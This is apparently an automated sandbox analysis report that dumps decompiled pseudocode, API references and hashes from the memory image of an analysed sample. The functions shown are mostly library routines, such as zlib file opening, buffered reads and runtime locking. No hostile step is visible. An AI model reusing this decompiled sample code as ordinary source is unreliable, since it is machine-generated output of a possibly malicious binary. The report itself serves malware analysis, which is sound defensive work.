                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				intOrPtr* _t57;
                                                                                                              				char* _t60;
                                                                                                              				char _t62;
                                                                                                              				intOrPtr _t63;
                                                                                                              				char _t64;
                                                                                                              				intOrPtr _t65;
                                                                                                              				intOrPtr _t66;
                                                                                                              				intOrPtr _t67;
                                                                                                              				intOrPtr _t69;
                                                                                                              				intOrPtr _t70;
                                                                                                              				intOrPtr _t74;
                                                                                                              				intOrPtr _t79;
                                                                                                              				intOrPtr _t82;
                                                                                                              				intOrPtr* _t83;
                                                                                                              				void* _t86;
                                                                                                              				char* _t88;
                                                                                                              				char* _t89;
                                                                                                              				intOrPtr* _t91;
                                                                                                              				intOrPtr* _t93;
                                                                                                              				signed int _t97;
                                                                                                              				signed int _t98;
                                                                                                              				void* _t100;
                                                                                                              				void* _t101;
                                                                                                              				void* _t102;
                                                                                                              				void* _t103;
                                                                                                              				void* _t104;
                                                                                                              
                                                                                                              				_t98 = _t97 | 0xffffffff;
                                                                                                              				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                              				_t91 = __eax;
                                                                                                              				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                              				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                              					__eflags = 0;
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					_t93 = E0040B80D(0, _t86, __eax, 0x74);
                                                                                                              					_t101 = _t100 + 4;
                                                                                                              					if(_t93 == 0) {
                                                                                                              						L31:
                                                                                                              						return 0;
                                                                                                              					} else {
                                                                                                              						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                              						 *_t93 = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                              						 *(_t93 + 0x6c) = _t98;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x4c)) = E00403030(0, 0, 0);
                                                                                                              						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                              						_t102 = _t101 + 0xc;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                              						_t87 = _t57 + 1;
                                                                                                              						do {
                                                                                                              							_t82 =  *_t57;
                                                                                                              							_t57 = _t57 + 1;
                                                                                                              						} while (_t82 != 0);
                                                                                                              						_t60 = E0040B80D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                              						_t103 = _t102 + 4;
                                                                                                              						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                              						if(_t60 == 0) {
                                                                                                              							L30:
                                                                                                              							E00405110(0, _t87, _t93);
                                                                                                              							goto L31;
                                                                                                              						} else {
                                                                                                              							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                              							_t88 = _t60;
                                                                                                              							goto L7;
                                                                                                              							L9:
                                                                                                              							L9:
                                                                                                              							if( *_t91 == 0x72) {
                                                                                                              								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                              							}
                                                                                                              							_t63 =  *_t91;
                                                                                                              							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                              								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                              							}
                                                                                                              							_t64 =  *_t91;
                                                                                                              							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                              								__eflags = _t64 - 0x66;
                                                                                                              								if(_t64 != 0x66) {
                                                                                                              									__eflags = _t64 - 0x68;
                                                                                                              									if(_t64 != 0x68) {
                                                                                                              										__eflags = _t64 - 0x52;
                                                                                                              										if(_t64 != 0x52) {
                                                                                                              											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                              											 *_t89 = _t64;
                                                                                                              											_t87 = _t89 + 1;
                                                                                                              											__eflags = _t87;
                                                                                                              											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                              										} else {
                                                                                                              											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                              										}
                                                                                                              									} else {
                                                                                                              										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                              									}
                                                                                                              								} else {
                                                                                                              									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                              								}
                                                                                                              							} else {
                                                                                                              								_t98 = _t64 - 0x30;
                                                                                                              							}
                                                                                                              							_t91 = _t91 + 1;
                                                                                                              							if(_t64 == 0) {
                                                                                                              								goto L26;
                                                                                                              							}
                                                                                                              							_t87 = _t103 + 0x68;
                                                                                                              							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                              								goto L9;
                                                                                                              							}
                                                                                                              							L26:
                                                                                                              							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                              							if(_t65 == 0) {
                                                                                                              								goto L30;
                                                                                                              							} else {
                                                                                                              								if(_t65 != 0x77) {
                                                                                                              									_t66 = E0040B80D(0, _t87, _t91, 0x4000);
                                                                                                              									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                              									 *_t93 = _t66;
                                                                                                              									_t67 = E00407150(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                              									_t104 = _t103 + 0x14;
                                                                                                              									__eflags = _t67;
                                                                                                              									if(_t67 != 0) {
                                                                                                              										goto L30;
                                                                                                              									} else {
                                                                                                              										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                              										if(__eflags == 0) {
                                                                                                              											goto L30;
                                                                                                              										} else {
                                                                                                              											goto L34;
                                                                                                              										}
                                                                                                              									}
                                                                                                              								} else {
                                                                                                              									_push(0x38);
                                                                                                              									_push("1.2.3");
                                                                                                              									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                              									_push(8);
                                                                                                              									_push(0xfffffff1);
                                                                                                              									_push(8);
                                                                                                              									_push(_t98);
                                                                                                              									_push(_t93);
                                                                                                              									_t91 = E00404C90();
                                                                                                              									_t79 = E0040B80D(0, _t87, _t91, 0x4000);
                                                                                                              									_t104 = _t103 + 0x24;
                                                                                                              									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                              									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                              									if(_t91 != 0 || _t79 == 0) {
                                                                                                              										goto L30;
                                                                                                              									} else {
                                                                                                              										L34:
                                                                                                              										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                              										 *((intOrPtr*)(E0040BF81(__eflags))) = 0;
                                                                                                              										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                              										__eflags = _t69;
                                                                                                              										_push(_t104 + 0x18);
                                                                                                              										if(__eflags >= 0) {
                                                                                                              											_push(_t69);
                                                                                                              											_t70 = E0040C913(0, _t87, _t91, _t93, __eflags);
                                                                                                              										} else {
                                                                                                              											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                              											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                              											_t70 = E0040CB5D();
                                                                                                              										}
                                                                                                              										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                              										__eflags = _t70;
                                                                                                              										if(_t70 == 0) {
                                                                                                              											goto L30;
                                                                                                              										} else {
                                                                                                              											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                              											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                              												E00404FB0(_t93, 0);
                                                                                                              												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                              												_t74 = E0040C8A5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                              												__eflags = _t74;
                                                                                                              												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                              												return _t93;
                                                                                                              											} else {
                                                                                                              												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                              												return _t93;
                                                                                                              											}
                                                                                                              										}
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              							goto L42;
                                                                                                              							L7:
                                                                                                              							_t62 =  *_t83;
                                                                                                              							 *_t88 = _t62;
                                                                                                              							_t83 = _t83 + 1;
                                                                                                              							_t88 = _t88 + 1;
                                                                                                              							if(_t62 != 0) {
                                                                                                              								goto L7;
                                                                                                              							} else {
                                                                                                              								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                              							}
                                                                                                              							goto L9;
                                                                                                              						}
                                                                                                              					}
                                                                                                              				}
                                                                                                              				L42:
                                                                                                              			}

































                                                                                                              0x00405881
                                                                                                              0x00405889
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040588b
                                                                                                              0x0040588b
                                                                                                              0x00405890
                                                                                                              0x00000000
                                                                                                              0x00405892
                                                                                                              0x00405894
                                                                                                              0x004058e0
                                                                                                              0x004058ef
                                                                                                              0x004058f2
                                                                                                              0x004058f4
                                                                                                              0x004058f9
                                                                                                              0x004058fc
                                                                                                              0x004058fe
                                                                                                              0x00000000
                                                                                                              0x00405900
                                                                                                              0x00405900
                                                                                                              0x00405903
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405903
                                                                                                              0x00405896
                                                                                                              0x0040589a
                                                                                                              0x0040589c
                                                                                                              0x004058a1
                                                                                                              0x004058a2
                                                                                                              0x004058a4
                                                                                                              0x004058a6
                                                                                                              0x004058a8
                                                                                                              0x004058a9
                                                                                                              0x004058b4
                                                                                                              0x004058b6
                                                                                                              0x004058bb
                                                                                                              0x004058be
                                                                                                              0x004058c1
                                                                                                              0x004058c6
                                                                                                              0x00000000
                                                                                                              0x00405905
                                                                                                              0x00405905
                                                                                                              0x00405905
                                                                                                              0x00405911
                                                                                                              0x00405913
                                                                                                              0x00405917
                                                                                                              0x0040591d
                                                                                                              0x0040591e
                                                                                                              0x0040592c
                                                                                                              0x0040592d
                                                                                                              0x00405920
                                                                                                              0x00405920
                                                                                                              0x00405924
                                                                                                              0x00405925
                                                                                                              0x00405925
                                                                                                              0x00405935
                                                                                                              0x00405938
                                                                                                              0x0040593a
                                                                                                              0x00000000
                                                                                                              0x0040593c
                                                                                                              0x0040593c
                                                                                                              0x00405940
                                                                                                              0x00405955
                                                                                                              0x0040595d
                                                                                                              0x00405966
                                                                                                              0x00405966
                                                                                                              0x00405969
                                                                                                              0x00405975
                                                                                                              0x00405942
                                                                                                              0x00405942
                                                                                                              0x00405952
                                                                                                              0x00405952
                                                                                                              0x00405940
                                                                                                              0x0040593a
                                                                                                              0x004058c6
                                                                                                              0x00405894
                                                                                                              0x00000000
                                                                                                              0x00405810
                                                                                                              0x00405810
                                                                                                              0x00405812
                                                                                                              0x00405814
                                                                                                              0x00405815
                                                                                                              0x00405818
                                                                                                              0x00000000
                                                                                                              0x0040581a
                                                                                                              0x0040581a
                                                                                                              0x0040581d
                                                                                                              0x00000000
                                                                                                              0x00405818
                                                                                                              0x004057ff
                                                                                                              0x0040579a
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 0040578E
                                                                                                                • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                                • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                                • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                              • _malloc.LIBCMT ref: 004057F2
                                                                                                              • _malloc.LIBCMT ref: 004058B6
                                                                                                              • _malloc.LIBCMT ref: 004058E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: _malloc$AllocateHeap
                                                                                                              • String ID: 1.2.3
                                                                                                              • API String ID: 680241177-2310465506
                                                                                                              • Opcode ID: cd0924cdb5ed944c5657c2e27923ccdb471edeb1bf7d7dc215a71cce5c5ea445
                                                                                                              • Instruction ID: d33edc5f4644e391b8b4222eb6447303ef68805c976fd54f75bf396b81ad9fa3
                                                                                                              • Opcode Fuzzy Hash: cd0924cdb5ed944c5657c2e27923ccdb471edeb1bf7d7dc215a71cce5c5ea445
                                                                                                              • Instruction Fuzzy Hash: 3461F8B2944B418FC720AF2A848065BBBE0FB45314F50893FE9D9A3780D739D8498F5A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 85%
                                                                                                              			E0040BC82(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                              				signed int _v8;
                                                                                                              				char* _v12;
                                                                                                              				signed int _v16;
                                                                                                              				signed int _v20;
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				signed int _t90;
                                                                                                              				intOrPtr* _t92;
                                                                                                              				signed int _t94;
                                                                                                              				char _t97;
                                                                                                              				signed int _t105;
                                                                                                              				void* _t106;
                                                                                                              				signed int _t107;
                                                                                                              				signed int _t110;
                                                                                                              				signed int _t113;
                                                                                                              				intOrPtr* _t114;
                                                                                                              				signed int _t118;
                                                                                                              				signed int _t119;
                                                                                                              				signed int _t120;
                                                                                                              				char* _t121;
                                                                                                              				signed int _t125;
                                                                                                              				signed int _t131;
                                                                                                              				signed int _t133;
                                                                                                              				void* _t134;
                                                                                                              
                                                                                                              				_t125 = __edx;
                                                                                                              				_t121 = _a4;
                                                                                                              				_t119 = _a8;
                                                                                                              				_t131 = 0;
                                                                                                              				_v12 = _t121;
                                                                                                              				_v8 = _t119;
                                                                                                              				if(_a12 == 0 || _a16 == 0) {
                                                                                                              					L5:
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					_t138 = _t121;
                                                                                                              					if(_t121 != 0) {
                                                                                                              						_t133 = _a20;
                                                                                                              						__eflags = _t133;
                                                                                                              						if(_t133 == 0) {
                                                                                                              							L9:
                                                                                                              							__eflags = _t119 - 0xffffffff;
                                                                                                              							if(_t119 != 0xffffffff) {
                                                                                                              								_t90 = E0040B9F0(_t131, _t121, _t131, _t119);
                                                                                                              								_t134 = _t134 + 0xc;
                                                                                                              							}
                                                                                                              							__eflags = _t133 - _t131;
                                                                                                              							if(__eflags == 0) {
                                                                                                              								goto L3;
                                                                                                              							} else {
                                                                                                              								_t94 = _t90 | 0xffffffff;
                                                                                                              								_t125 = _t94 % _a12;
                                                                                                              								__eflags = _a16 - _t94 / _a12;
                                                                                                              								if(__eflags > 0) {
                                                                                                              									goto L3;
                                                                                                              								}
                                                                                                              								L13:
                                                                                                              								_t131 = _a12 * _a16;
                                                                                                              								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                              								_v20 = _t131;
                                                                                                              								_t120 = _t131;
                                                                                                              								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                              									_v16 = 0x1000;
                                                                                                              								} else {
                                                                                                              									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                              								}
                                                                                                              								__eflags = _t131;
                                                                                                              								if(_t131 == 0) {
                                                                                                              									L40:
                                                                                                              									return _a16;
                                                                                                              								} else {
                                                                                                              									do {
                                                                                                              										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                              										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                              											L24:
                                                                                                              											__eflags = _t120 - _v16;
                                                                                                              											if(_t120 < _v16) {
                                                                                                              												_t97 = E0040FBC7(_t120, _t125, _t133);
                                                                                                              												__eflags = _t97 - 0xffffffff;
                                                                                                              												if(_t97 == 0xffffffff) {
                                                                                                              													L48:
                                                                                                              													return (_t131 - _t120) / _a12;
                                                                                                              												}
                                                                                                              												__eflags = _v8;
                                                                                                              												if(_v8 == 0) {
                                                                                                              													L44:
                                                                                                              													__eflags = _a8 - 0xffffffff;
                                                                                                              													if(__eflags != 0) {
                                                                                                              														E0040B9F0(_t131, _a4, 0, _a8);
                                                                                                              														_t134 = _t134 + 0xc;
                                                                                                              													}
                                                                                                              													 *((intOrPtr*)(E0040BF81(__eflags))) = 0x22;
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              													L4:
                                                                                                              													E0040E704(_t125, _t131, _t133);
                                                                                                              													goto L5;
                                                                                                              												}
                                                                                                              												_t123 = _v12;
                                                                                                              												_v12 = _v12 + 1;
                                                                                                              												 *_v12 = _t97;
                                                                                                              												_t120 = _t120 - 1;
                                                                                                              												_t70 =  &_v8;
                                                                                                              												 *_t70 = _v8 - 1;
                                                                                                              												__eflags =  *_t70;
                                                                                                              												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                              												goto L39;
                                                                                                              											}
                                                                                                              											__eflags = _v16;
                                                                                                              											if(_v16 == 0) {
                                                                                                              												_t105 = 0x7fffffff;
                                                                                                              												__eflags = _t120 - 0x7fffffff;
                                                                                                              												if(_t120 <= 0x7fffffff) {
                                                                                                              													_t105 = _t120;
                                                                                                              												}
                                                                                                              											} else {
                                                                                                              												__eflags = _t120 - 0x7fffffff;
                                                                                                              												if(_t120 <= 0x7fffffff) {
                                                                                                              													_t55 = _t120 % _v16;
                                                                                                              													__eflags = _t55;
                                                                                                              													_t125 = _t55;
                                                                                                              													_t110 = _t120;
                                                                                                              												} else {
                                                                                                              													_t125 = 0x7fffffff % _v16;
                                                                                                              													_t110 = 0x7fffffff;
                                                                                                              												}
                                                                                                              												_t105 = _t110 - _t125;
                                                                                                              											}
                                                                                                              											__eflags = _t105 - _v8;
                                                                                                              											if(_t105 > _v8) {
                                                                                                              												goto L44;
                                                                                                              											} else {
                                                                                                              												_push(_t105);
                                                                                                              												_push(_v12);
                                                                                                              												_t106 = L0040F9E0(_t125, _t131, _t133);
                                                                                                              												_pop(_t123);
                                                                                                              												_push(_t106);
                                                                                                              												_t107 = E004102B4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                              												_t134 = _t134 + 0xc;
                                                                                                              												__eflags = _t107;
                                                                                                              												if(_t107 == 0) {
                                                                                                              													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                              													goto L48;
                                                                                                              												}
                                                                                                              												__eflags = _t107 - 0xffffffff;
                                                                                                              												if(_t107 == 0xffffffff) {
                                                                                                              													L47:
                                                                                                              													_t80 = _t133 + 0xc;
                                                                                                              													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                              													__eflags =  *_t80;
                                                                                                              													goto L48;
                                                                                                              												}
                                                                                                              												_v12 = _v12 + _t107;
                                                                                                              												_t120 = _t120 - _t107;
                                                                                                              												_v8 = _v8 - _t107;
                                                                                                              												goto L39;
                                                                                                              											}
                                                                                                              										}
                                                                                                              										_t113 =  *(_t133 + 4);
                                                                                                              										__eflags = _t113;
                                                                                                              										if(__eflags == 0) {
                                                                                                              											goto L24;
                                                                                                              										}
                                                                                                              										if(__eflags < 0) {
                                                                                                              											goto L47;
                                                                                                              										}
                                                                                                              										_t131 = _t120;
                                                                                                              										__eflags = _t120 - _t113;
                                                                                                              										if(_t120 >= _t113) {
                                                                                                              											_t131 = _t113;
                                                                                                              										}
                                                                                                              										__eflags = _t131 - _v8;
                                                                                                              										if(_t131 > _v8) {
                                                                                                              											_t133 = 0;
                                                                                                              											__eflags = _a8 - 0xffffffff;
                                                                                                              											if(__eflags != 0) {
                                                                                                              												E0040B9F0(_t131, _a4, 0, _a8);
                                                                                                              												_t134 = _t134 + 0xc;
                                                                                                              											}
                                                                                                              											_t114 = E0040BF81(__eflags);
                                                                                                              											_push(_t133);
                                                                                                              											_push(_t133);
                                                                                                              											_push(_t133);
                                                                                                              											_push(_t133);
                                                                                                              											 *_t114 = 0x22;
                                                                                                              											_push(_t133);
                                                                                                              											goto L4;
                                                                                                              										} else {
                                                                                                              											E004103B1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                              											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                              											 *_t133 =  *_t133 + _t131;
                                                                                                              											_v12 = _v12 + _t131;
                                                                                                              											_t120 = _t120 - _t131;
                                                                                                              											_t134 = _t134 + 0x10;
                                                                                                              											_v8 = _v8 - _t131;
                                                                                                              											_t131 = _v20;
                                                                                                              										}
                                                                                                              										L39:
                                                                                                              										__eflags = _t120;
                                                                                                              									} while (_t120 != 0);
                                                                                                              									goto L40;
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t118 = _t90 | 0xffffffff;
                                                                                                              						_t90 = _t118 / _a12;
                                                                                                              						_t125 = _t118 % _a12;
                                                                                                              						__eflags = _a16 - _t90;
                                                                                                              						if(_a16 <= _t90) {
                                                                                                              							goto L13;
                                                                                                              						}
                                                                                                              						goto L9;
                                                                                                              					}
                                                                                                              					L3:
                                                                                                              					_t92 = E0040BF81(_t138);
                                                                                                              					_push(_t131);
                                                                                                              					_push(_t131);
                                                                                                              					_push(_t131);
                                                                                                              					_push(_t131);
                                                                                                              					 *_t92 = 0x16;
                                                                                                              					_push(_t131);
                                                                                                              					goto L4;
                                                                                                              				}
                                                                                                              			}





























                                                                                                              0x0040bd43
                                                                                                              0x0040bd45
                                                                                                              0x0040bd45
                                                                                                              0x0040bd47
                                                                                                              0x0040bd4a
                                                                                                              0x0040be1b
                                                                                                              0x0040be1d
                                                                                                              0x0040be21
                                                                                                              0x0040be2a
                                                                                                              0x0040be2f
                                                                                                              0x0040be2f
                                                                                                              0x0040be32
                                                                                                              0x0040be37
                                                                                                              0x0040be38
                                                                                                              0x0040be39
                                                                                                              0x0040be3a
                                                                                                              0x0040be3b
                                                                                                              0x0040be41
                                                                                                              0x00000000
                                                                                                              0x0040bd50
                                                                                                              0x0040bd59
                                                                                                              0x0040bd5e
                                                                                                              0x0040bd61
                                                                                                              0x0040bd63
                                                                                                              0x0040bd66
                                                                                                              0x0040bd68
                                                                                                              0x0040bd6b
                                                                                                              0x0040bd6e
                                                                                                              0x0040bd6e
                                                                                                              0x0040be0b
                                                                                                              0x0040be0b
                                                                                                              0x0040be0b
                                                                                                              0x00000000
                                                                                                              0x0040bd29
                                                                                                              0x0040bd23
                                                                                                              0x0040bcee
                                                                                                              0x0040bccf
                                                                                                              0x0040bcd4
                                                                                                              0x0040bcd4
                                                                                                              0x0040bcd7
                                                                                                              0x0040bcda
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040bcda
                                                                                                              0x0040bca9
                                                                                                              0x0040bca9
                                                                                                              0x0040bcae
                                                                                                              0x0040bcaf
                                                                                                              0x0040bcb0
                                                                                                              0x0040bcb1
                                                                                                              0x0040bcb2
                                                                                                              0x0040bcb8
                                                                                                              0x00000000
                                                                                                              0x0040bcb8

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 4048096073-0
                                                                                                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                              • Instruction ID: ac71b8413edd5c82999a863e1080af1727f4c3550edc762b5dddd404fb77a0c7
                                                                                                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                              • Instruction Fuzzy Hash: 3551E030900605EBDB219F6AC84499FBB74EF91324F24863BE825B22D1D7788E51CBDD
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 90%
                                                                                                              			E004146F8(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                              				signed int _t13;
                                                                                                              				intOrPtr _t28;
                                                                                                              				void* _t29;
                                                                                                              				void* _t30;
                                                                                                              
                                                                                                              				_t30 = __eflags;
                                                                                                              				_t26 = __edi;
                                                                                                              				_t25 = __edx;
                                                                                                              				_t22 = __ebx;
                                                                                                              				_push(0xc);
                                                                                                              				_push(0x4214d0);
                                                                                                              				E0040E198(__ebx, __edi, __esi);
                                                                                                              				_t28 = E004106F5(__ebx, __edx, __edi, _t30);
                                                                                                              				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                              					L6:
                                                                                                              					E0040D6A0(_t22, 0xc);
                                                                                                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                              					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                              					_t26 =  *0x422f18; // 0x422e40
                                                                                                              					 *((intOrPtr*)(_t29 - 0x1c)) = E004146BA(_t8, _t26);
                                                                                                              					 *(_t29 - 4) = 0xfffffffe;
                                                                                                              					E00414762();
                                                                                                              				} else {
                                                                                                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                              						goto L6;
                                                                                                              					} else {
                                                                                                              						_t28 =  *((intOrPtr*)(E004106F5(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                              					}
                                                                                                              				}
                                                                                                              				if(_t28 == 0) {
                                                                                                              					E0040E75A(_t25, _t26, 0x20);
                                                                                                              				}
                                                                                                              				return E0040E1DD(_t28);
                                                                                                              			}








                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00414704
                                                                                                                • Part of subcall function 004106F5: __getptd_noexit.LIBCMT ref: 004106F8
                                                                                                                • Part of subcall function 004106F5: __amsg_exit.LIBCMT ref: 00410705
                                                                                                              • __getptd.LIBCMT ref: 0041471B
                                                                                                              • __amsg_exit.LIBCMT ref: 00414729
                                                                                                              • __lock.LIBCMT ref: 00414739
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                              • String ID: @.B
                                                                                                              • API String ID: 3521780317-470711618
                                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                              • Instruction ID: 79052d33ef1135b751d7225a88192fb2588a7deb6a586739662bc9de74a94e56
                                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                              • Instruction Fuzzy Hash: D8F0BB31A40300DBD720BF769A0278D73A0AF82759F51452FE554673D1CB7C5C819B5D
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 65%
                                                                                                              			E004135D0() {
                                                                                                              				signed long long _v12;
                                                                                                              				signed int _v20;
                                                                                                              				signed long long _v28;
                                                                                                              				signed char _t8;
                                                                                                              
                                                                                                              				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                              				if(_t8 == 0) {
                                                                                                              					L6:
                                                                                                              					_v20 =  *0x41fb50;
                                                                                                              					_v28 =  *0x41fb48;
                                                                                                              					asm("fsubr qword [ebp-0x18]");
                                                                                                              					_v12 = _v28 / _v20 * _v20;
                                                                                                              					asm("fld1");
                                                                                                              					asm("fcomp qword [ebp-0x8]");
                                                                                                              					asm("fnstsw ax");
                                                                                                              					if((_t8 & 0x00000005) != 0) {
                                                                                                              						return 0;
                                                                                                              					} else {
                                                                                                              						return 1;
                                                                                                              					}
                                                                                                              				} else {
                                                                                                              					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                              					if(__eax == 0) {
                                                                                                              						goto L6;
                                                                                                              					} else {
                                                                                                              						_push(0);
                                                                                                              						return __eax;
                                                                                                              					}
                                                                                                              				}
                                                                                                              			}








                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDB5), ref: 004135D5
                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004135E5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
